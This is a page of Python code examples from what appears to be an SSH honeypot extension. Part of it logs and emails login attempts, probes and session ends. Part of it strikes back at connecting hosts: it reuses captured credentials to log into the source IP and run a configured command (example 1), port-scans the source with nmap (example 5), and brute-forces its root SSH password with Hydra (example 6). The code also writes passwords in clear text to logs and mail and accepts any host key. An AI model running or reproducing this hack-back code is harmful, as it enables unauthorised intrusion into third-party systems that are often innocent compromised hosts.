Ejemplo n.º 1
    def loginThread(self):
        """Try the stored credentials against ``self.clientip`` over SSH.

        On a successful connect, a notification is mailed, one command is
        read from the ``dirtybastard`` config section (``root_command`` when
        the username is "root", otherwise ``not_root_command``) and executed
        on the peer, and the command's stdout is printed and mailed.

        NOTE(review): ``self.password`` is written in clear text to stdout
        and into the 'New login success!' mail body.
        NOTE(review): the bare ``except`` labels every connect failure
        (timeout, refused connection, ...) as "Authentication failed".
        NOTE(review): ``client`` is never closed, and the command's stderr
        and exit status are discarded.
        """
        # presumably paramiko's SSHClient/AutoAddPolicy; with that policy the
        # peer's host key is accepted without any verification.
        client = SSHClient()
        client.set_missing_host_key_policy(AutoAddPolicy())

        target = self.username + "@" + self.clientip + " (" + self.password + ")"
        print("Attempting login with %s" % target)

        try:
            client.connect(
                hostname=self.clientip,
                username=self.username,
                password=self.password,
            )
        except:
            print("Authentication failed for %s" % target)
            return

        sendEmail('New login success!',
                  "Successfully logged in to remote box: " + target)

        option = "root_command" if self.username == "root" else "not_root_command"
        # The config value is stored wrapped in quotes; drop the first and
        # last character to get the bare command.
        command = config().get('dirtybastard', option)[1:-1]

        print("SUCCESS! Running command: " + command)
        stdin, stdout, stderr = client.exec_command(command)

        # Everything read from stdout is produced by the remote host and is
        # printed and mailed as received, apart from whitespace stripping.
        print("stdout:")
        cleaned = [raw.strip() for raw in stdout.readlines()]
        for text in cleaned:
            print(text)
        collected = "".join(text + "\n" for text in cleaned)

        sendEmail('Output from command', "stdout:\n" + collected)
Ejemplo n.º 2
 def checkUserPass(self, username, password):
     """Check a username/password pair against ``UserDB`` and log the outcome.

     Returns True when ``UserDB().checklogin`` accepts the pair, False
     otherwise. On success a mail is also sent when the ``smtp`` config
     section has ``alert_login`` set to exactly ``'true'``.

     NOTE(review): ``username`` and ``password`` are interpolated into the
     log line and mail body without escaping, so any newlines or control
     characters in them reach the log and mailbox unchanged.
     """
     cfg = config()
     if not UserDB().checklogin(username, password):
         print('login attempt [%s/%s] failed' % (username, password))
         return False

     print('login attempt [%s/%s] succeeded' % (username, password))
     # The option is compared as a literal string: 'True' or 'yes' do not
     # enable the alert.
     wants_mail = (cfg.has_option('smtp', 'alert_login')
                   and cfg.get('smtp', 'alert_login') == 'true')
     if wants_mail:
         print('Emailing about login notification (alert_login = true).')
         body = 'There was a succesfully login (%s/%s).' % (username, password)
         sendEmail('SSH Succesful Login', body)
     return True
Ejemplo n.º 3
 def connectionLost(self, reason):
     """Clean up per-session state when the SSH connection ends.

     Notifies every interactor, removes the session from the factory's
     session table, calls ``lastlogExit``, closes the tty log if it is
     open, optionally mails an alert (``smtp`` / ``alert_quit`` set to
     exactly ``'true'``), and finally delegates to the base transport.

     NOTE(review): the mail body reads ``self.ttylog_file`` whether or not
     ``ttylog_open`` was ever true; where that attribute is first assigned
     is not visible in this method.
     """
     cfg = config()
     for interactor in self.interactors:
         interactor.sessionClosed()

     session_id = self.transport.sessionno
     sessions = self.factory.sessions
     if session_id in sessions:
         del sessions[session_id]

     self.lastlogExit()

     if self.ttylog_open:
         ttylog.ttylog_close(self.ttylog_file, time.time())
         self.ttylog_open = False

     # The option is compared as a literal string, not parsed as a boolean.
     if cfg.has_option('smtp', 'alert_quit') and cfg.get('smtp', 'alert_quit') == 'true':
         print('Emailing about attack being over (alert_quit = true).')
         body = 'The attacker quit.\n\nPlease check the logs (%s)!' % (self.ttylog_file)
         sendEmail('SSH Attack Finished', body)

     transport.SSHServerTransport.connectionLost(self, reason)
Ejemplo n.º 4
 def connectionMade(self):
     """Log a new inbound connection and initialise per-session state.

     Prints both endpoints and the session number, resets ``interactors``,
     ``logintime`` and ``ttylog_open``, optionally mails a probe alert
     (``smtp`` / ``alert_probe`` set to exactly ``'true'``), and then
     delegates to the base transport.

     NOTE(review): the alert is sent from inside this connection callback,
     once per inbound connection, with no rate limit in this method.
     """
     cfg = config()
     peer = self.transport.getPeer()
     local = self.transport.getHost()
     # (peer host, peer port, local host, local port, session number)
     details = (peer.host, peer.port, local.host, local.port,
                self.transport.sessionno)

     print('New connection: %s:%s (%s:%s) [session: %d]' % details)

     self.interactors = []
     self.logintime = time.time()
     self.ttylog_open = False

     # The option is compared as a literal string, not parsed as a boolean.
     if cfg.has_option('smtp', 'alert_probe') and cfg.get('smtp', 'alert_probe') == 'true':
         print('Emailing about SSH probe (alert_probe = true).')
         body = 'There was an SSH probe request.\nFrom: %s:%s.\nTo: %s:%s.\nKippo Session: %s.' % details
         sendEmail('SSH Probe', body)

     transport.SSHServerTransport.connectionMade(self)
Ejemplo n.º 5
    def scanThread(self):
        """Run nmap against ``self.clientip`` and mail a per-port summary.

        The nmap argument string is taken from the ``nmap_args`` option of
        the ``dirtybastard`` config section. Every TCP and UDP port present
        in the scan result is listed, followed by each key/value pair nmap
        returned for it. The summary is printed and passed to ``sendEmail``.

        NOTE(review): every port key in the result is labelled "open"; no
        state field is checked here.
        NOTE(review): a missing host or protocol entry is ignored silently,
        so an empty report is still mailed.
        """
        scanner = nmap.PortScanner()

        scan_args = config().get("dirtybastard", "nmap_args")[1:-1]  # Remove quotes
        print("Running portscan at %s with arguments: %s" % (self.clientip, scan_args))

        try:
            scanner.scan(self.clientip, arguments=scan_args)
        except nmap.PortScannerError:
            print("!!! PortScan error. Did you request a scan type that requires root?")
            return

        # Collect the port numbers per protocol; absence of the host or of
        # the protocol section both surface as KeyError.
        ports_by_proto = {}
        for proto in ("tcp", "udp"):
            try:
                ports_by_proto[proto] = list(scanner[self.clientip][proto].keys())
            except KeyError:
                ports_by_proto[proto] = []

        report_lines = []
        for proto, heading in (("tcp", "TCP Port open: %s\n"),
                               ("udp", "UDP Port open: %s\n")):
            for port in ports_by_proto[proto]:
                report_lines.append(heading % (port))
                details = scanner[self.clientip][proto][port]
                for field in details:
                    report_lines.append("\t - %s: %s\n" % (field, details[field]))

        report = "".join(report_lines)
        print(report)

        sendEmail("Port scan results " + self.clientip, report)
Ejemplo n.º 6
    def bruteforceThread(self):
        """Run the configured Hydra binary against ``self.clientip`` and mail its output.

        The binary path and password list come from the ``hydra_location``
        and ``password_list`` options of the ``dirtybastard`` config section;
        the method returns early when ``self.validFiles`` rejects them.

        NOTE(review): only stdout is piped, so anything the child writes to
        stderr is not captured or mailed.
        NOTE(review): ``communicate()`` is called without a timeout and
        blocks this thread until the child process exits.
        """
        print("Launching Hydra at %s." % (self.clientip))

        settings = config()
        hydra_bin = settings.get('dirtybastard', 'hydra_location')
        wordlist = settings.get('dirtybastard', 'password_list')

        if not self.validFiles(hydra_bin, wordlist):
            return

        # Passed as an argument list, so no shell parses these values.
        argv = [hydra_bin, self.clientip, "ssh", "-l", "root", "-P", wordlist]
        proc = subprocess.Popen(argv, stdout=subprocess.PIPE)
        output = proc.communicate()[0]

        print("Hydra complete (%s)." % (self.clientip))
        print("stdout: %s" % output)

        sendEmail('Hydra results ' + self.clientip, output)
Ejemplo n.º 7
 def loginSuccess(self, username, password):
     """Print a successful login and mail the same line via ``sendEmail``.

     NOTE(review): both values are interpolated without escaping, and the
     password appears in clear text in the log line and the mail body.
     """
     message = 'login attempt [%s/%s] succeeded' % (username, password)
     print(message)
     sendEmail('New attacker', message)